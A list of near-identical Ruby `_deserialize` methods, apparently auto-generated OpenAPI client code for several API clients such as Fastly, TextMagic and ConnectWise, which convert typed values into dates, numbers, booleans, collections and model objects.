"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n MailSlurpClient.const_get(type).build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Esi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Esi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Esi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Fastly.const_get(type)\n klass.respond_to?(:fastly_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Fastly.const_get(type)\n klass.respond_to?(:fastly_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Fastly.const_get(type)\n klass.respond_to?(:fastly_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Fastly.const_get(type)\n klass.respond_to?(:fastly_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n ::DateTime.parse(value)\n when :Date\n ::Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Models.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n ::DateTime.parse(value)\n when :Date\n ::Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Models.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Hubspot::Cms::Performance.const_get(type)\n klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = SmoochApi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Tradenity.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Tradenity.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = SamplifyAPIClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = OpsgenieClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = LemonWayClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = BudgeaClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = BudgeaClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n Nodeum.const_get(type).build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TextMagic.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TextMagic.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TextMagic.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n Date.parse value\n when :Date\n Date.parse value\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else\n # model\n temp_model = GroupDocsViewerCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n Date.parse value\n when :Date\n Date.parse value\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else\n # model\n temp_model = GroupDocsViewerCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n Date.parse value\n when :Date\n Date.parse value\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else\n # model\n temp_model = GroupDocsViewerCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
